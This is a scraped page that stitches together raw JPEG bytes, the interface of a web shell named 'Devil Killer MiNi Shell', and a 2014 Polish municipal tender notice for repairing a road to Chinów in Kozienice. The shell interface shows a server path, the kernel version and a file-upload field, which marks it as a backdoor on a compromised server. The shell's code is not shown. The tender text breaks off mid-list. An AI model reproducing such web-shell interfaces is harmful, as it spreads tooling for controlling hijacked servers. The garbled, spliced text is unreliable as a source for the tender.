JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140217/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140217/54962-N-2014.html

<p class="kh_header"><b>Kozienice: Remont drogi w miejscowości Chinów</b><br>
<b>Numer ogłoszenia: 54962 - 2014; data zamieszczenia: 17.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Kozienice , ul. Parkowa 5, 26-900 Kozienice, woj. mazowieckie, tel. 048 6117100, faks 048 6142048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozienice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont drogi w miejscowości Chinów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont  drogi gminnej nr 170538 na odcinku od drogi krajowej nr 79 do m. Chinów tj. - od km 0+018,34 do km 0+174,46, polegający na:
-	rozbiórce początkowego i końcowego odcinka drogi oraz korytowaniu, wykonaniu nowych warstw podbudowy  tych odcinków,
-	wykonaniu  nawierzchni bitumicznej drogi,
-	oznakowaniu  drogi
 wraz z regulacją spadków podłużnych i poprzecznych oraz ujednoliceniem szerokości drogi. 
Projektowana inwestycja polega na:
-	rozbiórce istniejącej nawierzchni na początkowym oraz końcowym odcinku drogi, korytowaniu i jej podbudowie, 
-	wykonaniu nawierzchni bitumicznej drogi,
-	wykonaniu poboczy drogi,
-	uporządkowaniu terenu,
-	wykonaniu oznakowania  drogi wraz z obarierowaniem,
-	dostosowaniem rzędnej posadowienia wiaty przystankowej do rzędnej drogi wraz z ew. zmianą lokalizacji  i utwardzeniem kruszywem terenu pod wiatę.
Przyjęto  następujące parametry techniczne drogi:
- przekrój normalny				- 1_2,
- szerokość jezdni				- 5,5m.
Zadanie będzie realizowane w oparciu o projekt wykonawczy, szczegółową specyfikację techniczną wykonania i odbioru robót, zgodnie z  zasadami wiedzy technicznej i sztuki budowlanej, zachowując warunki określone w siwz.

Zakres rzeczowy robót obejmuje:  
1. remont odcinka drogi gminnej, obejmujący w szczególności:
1.1.roboty przygotowawcze i rozbiórkowe, w tym:
-	pomiarowe,
-	rozbiórkowe, w tym nawierzchni, krawężników, podbudowy ,
-	wywóz materiału pochodzącego z rozbiórki, 
1.2.roboty ziemne, w tym,
-	wykonanie koryta,
-	wykonanie nasypu,
-	transport gruntu,
1.3.roboty drogowe, w tym:
-	wzmocnienie podłoża,
-	podbudowa,
-	oczyszczenie i skropienie nawierzchni,
-	podbudowa asfaltowa,
-	nawierzchnia asfaltowa,
-	nawierzchnia poboczy,
1.4.inne roboty, w tym:
-	plantowanie terenu  i wykonanie trawników,
-	demontaż oraz montaż znaków drogowych i barier ochronnych,
-	demontaż istniejącej wiaty przystankowej oraz dostosowanie rzędnej jej  posadowienia do rzędnej zmodernizowanej drogi z ew. zmianą lokalizacji i utwardzeniem kruszywem terenu pod ten obiekt.
2.Zabezpieczenie infrastruktury technicznej:
2.1.Przed rozpoczęciem robót Wykonawca dokona sprawdzenia przebiegu infrastruktury technicznej i właściwego jej zabezpieczenia. 
2.2.Kolizje z istniejącymi instalacjami należy właściwie zabezpieczyć. 
3.Dodatkowe warunki wykonawcze:
3.1.Do Wykonawcy należy:
- wykonanie niezbędnych pomiarów, prób i badań w zakresie wykonywanych robót,
- wywóz i utylizacja wszelkich materiałów pochodzących z rozbiórki,
- w kosztach inwestycji należy uwzględnić koszty niezbędnych robót odtworzeniowych, 
- odtworzenie ewentualnych uszkodzeń powstałych w czasie prowadzenia robót, 
- wykonywanie nieodpłatnych przeglądów i usuwanie uszkodzeń wynikających z wad produkcyjnych lub 
  zastosowania wadliwych materiałów,
- przeprowadzenie prób, pomiarów, sprawdzeń i odbiorów przewidzianych warunkami technicznymi na  
  własny koszt,
- kompleksowa obsługa geodezyjna zadania.
      3.2.Wykonawca w ramach zadania:
- dokona zakupu, dostawy i montażu wszystkich urządzeń, 
- dokona odbiorów branżowych robót  oraz odbioru końcowego przedmiotu umowy,
- wykona gwarancyjne przeglądy techniczne.

Warunki realizacji przedmiotu zamówienia:

1.Roboty budowlane prowadzić należy zgodnie z obowiązującymi przepisami prawa polskiego, a w szczególności z wymogami Prawa budowlanego z dnia 07.07.1994r. (tekst jednolity Dz. U. z 2010r. nr 243, poz. 1623 z póź. zm. ) oraz przepisów wykonawczych. 

2.Roboty będące przedmiotem zamówienia wykonawca wykona kompleksowo. 

3. W ramach robót, o których mowa w pkt. I Wykonawca:
-	zabezpieczy trwale i oznakuje teren budowy zgodnie z przepisami,
-	dokona urządzenia placu budowy i poniesie koszty utrzymania zaplecza budowy,
-	będzie dbał o porządek na terenie budowy podczas wykonywania robót,
-	uporządkuje teren budowy  po zakończeniu robót, 
-	zapewni ochronę terenów przyległych do placu budowy i ponosi odpowiedzialność cywilną za
ewentualne szkody wynikłe z tytułu prowadzonych prac wobec osób trzecich,
-	będzie prowadził roboty w sposób wolny od przeszkód komunikacyjnych i będzie minimalizował 
utrudnienia, 
-	zobowiązany jest do utrzymania ruchu publicznego w okresie trwania realizacji umowy aż do zakończenia i odbioru ostatecznego robót,
-	przyjmie właściwą organizację robót (przy organizacji robót należy uwzględnić fakt, iż prace będą prowadzone w sąsiedztwie czynnych obiektów), 
-	w czasie wykonywania robót wykonawca dostarczy, zainstaluje i będzie obsługiwał wszystkie tymczasowe urządzenia zabezpieczające takie jak: zapory, światła ostrzegawcze, sygnały itp., zapewniając w ten sposób bezpieczeństwo pojazdów i pieszych,
-	zobowiązany jest co najmniej na 5 dni przed planowanym terminem rozpoczęcia robót do powiadomienia właścicieli działek w sąsiedztwie których będą prowadzone prace oraz do publicznego obwieszczenia w miejscach i ilościach określonych przez zamawiającego o terminie przystąpienia do ich wykonywania,
-	Wykonawca w terminie o którym mowa we wzorze umowy opracuje i przedstawi Zamawiającemu do zatwierdzenia harmonogram rzeczowo-finansowy w stopniu szczegółowości niezbędnym do rozliczania wykonanych robót, 
-	zobowiązany jest opracować projekty organizacji ruchu na czas prowadzenia robót wraz z uzyskaniem wymaganych  zezwoleń, poniesie koszty związane z zajęciem pasów drogowych oraz oznakowaniem ich na czas prowadzenia robót zgodnie z przepisami,
-	zobowiązany jest zabezpieczyć istniejące urządzenia kolidujące z zadaniem zgodnie z zaleceniami właścicieli sieci (w miejscach kolizji roboty ziemne wykonywać ręcznie),
-	zobowiązany jest roboty w miejscach kolizji z istniejącą siecią prowadzić pod nadzorem właścicieli sieci, 
-	zobowiązany jest do wykonania przez uprawnione laboratoria  pomiarów i badań w czasie realizacji inwestycji, potwierdzających jakość wykonanych robót i wbudowanych materiałów,
-	zobowiązany jest do regulacji wysokościowej urządzeń zlokalizowanych w obrębie realizacji inwestycji ( studzienek, zasuw, zaworów, itp.),
-	zobowiązany jest do przeprowadzenia wymaganych przez obowiązujące przepisy prób, badań, pomiarów, w tym elementów drogi oraz innych urządzeń,
-	zobowiązany jest do zapewnienia kompleksowej obsługi geodezyjnej zachowując postanowienia  Roz.M.G.P.iB. z dn.21.02.1995r (Dz. U. nr 25 poz.133) w sprawie  rodzaju i zakresu  opracowań   geodezyjno-kartograficznych oraz czynności geodezyjnych   obowiązujących  w  budownictwie, w tym czynności geodezyjnych obowiązujących w budownictwie oraz na każde żądanie Zamawiającego wykonanie:
-	pomiarów realizacyjnych -kontrolne pomiary elementów inwestycji, w tym grubości poszczególnych warstw dla robót drogowych, bilans robót ziemnych, itp., 
-	potwierdzenie wpisem do dziennika budowy wykonania czynności geodezyjnych, 
-	przekazanie Zamawiającemu kopii szkiców tyczenia i kontroli położenia elementów inwestycji, 
-	geodezyjna inwentaryzacja powykonawcza elementów inwestycji, wraz z podziałem szczegółowym na  rodzaj robót, średnice i ilości wykonanych robot w podziale na branże - wg wymagań inspektora nadzoru,
-	powykonawcza dokumentacja geodezyjno - kartograficzna obiektów w formie i zakresie przewidzianym  wymaganymi przepisami obowiązującymi na dzień  odbioru zadania,
-	przekazanie zamawiającemu 5 kompletów  kopii mapy powstałej w wyniku geodezyjnej inwentaryzacji powykonawczej wraz z danymi dot. ilości robót z podziałem na branże, rodzaje robót, średnice, 

4. Uwzględniając specyfikę obiektu i warunki prowadzenia robót na Wykonawcy spoczywa obowiązek zabezpieczenia robót pod względem technicznym i bezpieczeństwa, monitorowanie budowy podczas przerw technologicznych oraz ocena ryzyka dla zadania inwestycyjnego uwzględniająca zagrożenia jakie mogą wystąpić w okresie realizacji zadania w związku z przyjętą technologią i sposobem wykonywania robót.

5. Przed przystąpieniem do robót, o terminie rozpoczęcia prac budowlanych w obrębie urządzeń infrastruktury technicznej wykonawca zobowiązany jest powiadomić właścicieli tych urządzeń z odpowiednim  wyprzedzeniem przed planowanym terminem rozpoczęcia prac. 

6. Przy realizacji umowy Wykonawca zobowiązuje się stosować materiały i wyroby dopuszczone do obrotu 
i powszechnego lub jednostkowego stosowania w budownictwie zgodnie z ustawą z dnia 7 lipca 1994r. Prawo budowlane i ustawą o wyrobach budowlanych z dn. 16 kwietnia 2004r. wraz z dokumentami potwierdzającymi ich jakość. Wykonawca przed zastosowaniem jakichkolwiek materiałów przedstawi inspektorowi nadzoru źródło ich pochodzenia, atesty lub aprobaty techniczne, certyfikaty, deklaracje zgodności, świadectwa badań laboratoryjnych oraz świadectwa dopuszczenia do stosowania 
w budownictwie. Każdy rodzaj robót, w których znajdą się materiały nieodpowiadające normom 
i niezaakceptowane przez Zamawiającego, Wykonawca wykonuje na własne ryzyko, licząc się z jego nie przyjęciem i niezapłaceniem.

7. Wykonawca zobowiązany jest do zawarcia na własny koszt odpowiednich umów ubezpieczenia z tytułu szkód, zdarzeń losowych oraz od odpowiedzialności cywilnej na czas realizacji robót objętych umową. Ubezpieczeniu podlegają w szczególności:
- roboty objęte umową, urządzenia oraz wszelkie mienie ruchome związane bezpośrednio 
     z wykonawstwem robót,
-   odpowiedzialność cywilna za szkody oraz następstwa nieszczęśliwych wypadków dotyczące   
    pracowników i osób trzecich, powstałe w związku z prowadzonymi robotami..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy Pzp do wysokości 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.23-7, 45.23.31.40-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiający nie żąda zabezpieczenia oferty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie przewiduje w ramach zamówienia czynności objętych koniecznością posiadania uprawnień przez Zamawiającego. 
Oceny spełnienia  warunku  udziału w postępowaniu w tym zakresie Zamawiający dokona na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu o którym mowa w  pkt. 9.1. a.siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki  dotyczące:	posiadania wiedzy i doświadczenia koniecznego do wykonania niniejszego zamówienia - zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył:
co najmniej jedno zamówienie polegające na wykonaniu robót budowlanych przedmiotem których była budowa i_lub przebudowa i_lub remont jezdni drogi_ulicy klasy co najmniej dojazdowej o pow. łącznej co najmniej 500 m2 i załączy dowody określające, czy  roboty te zostały wykonane w sposób należyty oraz wskazujące, czy roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (w_wym warunek musi być spełniony w ramach 1 zadania).Ocena spełnienia w_w warunku dokonana zostanie w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach wymienionych w pkt. 9 SIWZ. Z treści załączonych dokumentów musi wynikać, że w_w warunki wykonawca spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki  dotyczące	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże że dysponuje co  najmniej: 
jedną osobą z co najmniej kwalifikacjami zawodowymi do kierowania robotami budowlanymi, posiadającymi uprawnienia budowlane w rozumieniu przepisów ustawy z dn. 7 lipca 1994r. Prawo Budowlane ( Dz.U. z 2010r. Nr 243, poz. 1623 ze zm.) w specjalności drogowej lub konstrukcyjno-budowlanej co najmniej w ograniczonym zakresie w rozumieniu przepisów ustawy z dn. 7 lipca 1994r. Prawo Budowlane ( Dz.U. z 2006r. Nr 156, poz. 1118 ze zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednich przepisów obowiązujących na  terenie kraju z którego pochodzi dana osoba, które  w zakresie objętym zamówieniem pozwalać będą na pełnienie samodzielnych funkcji technicznych w ww. specjalności.
UWAGA: 
- Osoby o których mowa powyżej winny posiadać biegłą znajomość języka polskiego. 
- W przypadku wykonawców zagranicznych dopuszcza się kwalifikacje równoważne do ww. zdobyte w innych państwach na zasadach określonych w art. 12 a ustawy z dnia 7.7.1994 r. Prawo Budowlane (tekst jednolity z 2011 Dz. U. 243 poz. 1623 z późniejszymi zmianami).

- Zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo Budowlane samodzielne funkcje techniczne w budownictwie, m.in. kierowanie robotami budowlanymi mogą wykonywać wyłącznie osoby posiadające odpowiednie uprawnienia budowlane, będące członkami właściwych terytorialnie okręgowych izb samorządu zawodowego ( Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.).
Ocena spełnienia w_w warunku dokonana zostanie w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach wymienionych w pkt. 9 SIWZ. Z treści załączonych dokumentów musi wynikać, że w_w warunki wykonawca spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)stosowne Pełnomocnictwo do reprezentacji - jeżeli osoby podpisujące ofertę działają na podstawie pełnomocnictwa - musi zostać ono złożone jako część oferty w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza,
b)	dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,
c)	pisemne zobowiązanie innych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia ( np. wg wzoru - załącznik nr 7 do siwz lub inny równoważny dokument- patrz -uwaga- do punktu 8.2.1 siwz, jeżeli wykonawca przy wykazywaniu spełniania warunków udziału w postępowaniu, o których mowa w pkt 8.1.2 i/lub 8.1.3siwz powołuje się na potencjał innych podmiotów.
d.Jeżeli w kraju miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 9.5.1.siwz  zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca  ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Dokument powinien być wystawiony nie wcześniej niż 6  miesięcy przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania za jego zgodą następujących zmian postanowień zawartej umowy w stosunku do treści oferty:

1.	Terminu wykonania zadania w następujących przypadkach:
1.1.	Niesprzyjających warunków  pogodowych.
1.2.	Niedopełnieniu przez Zamawiającego jego obowiązków wynikających 
z umowy.
1.3.	Z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego.
1.4.	Z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed zawarciem umowy przez doświadczonego wykonawcę, robót.
1.5.	Z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć 
z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu lub grożącego powstaniem szkody w znacznych rozmiarach.
1.6.	Z powodu stanu wyższej konieczności, powodującego podjęcie działań w celu uchylenia bezpośredniego niebezpieczeństwa grożącego dobru społecznemu lub jakiemukolwiek dobru jednostki,
7.	Z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.
1.8.	Zawieszenie wykonania prac niespowodowanych uchybieniami Wykonawcy,
1.9.	Wystąpienia okoliczności, których nie można było wcześniej przewidzieć a są one niezależne od stron,
1.10.	Ograniczenia lub czasowego wstrzymania finansowania inwestycji.

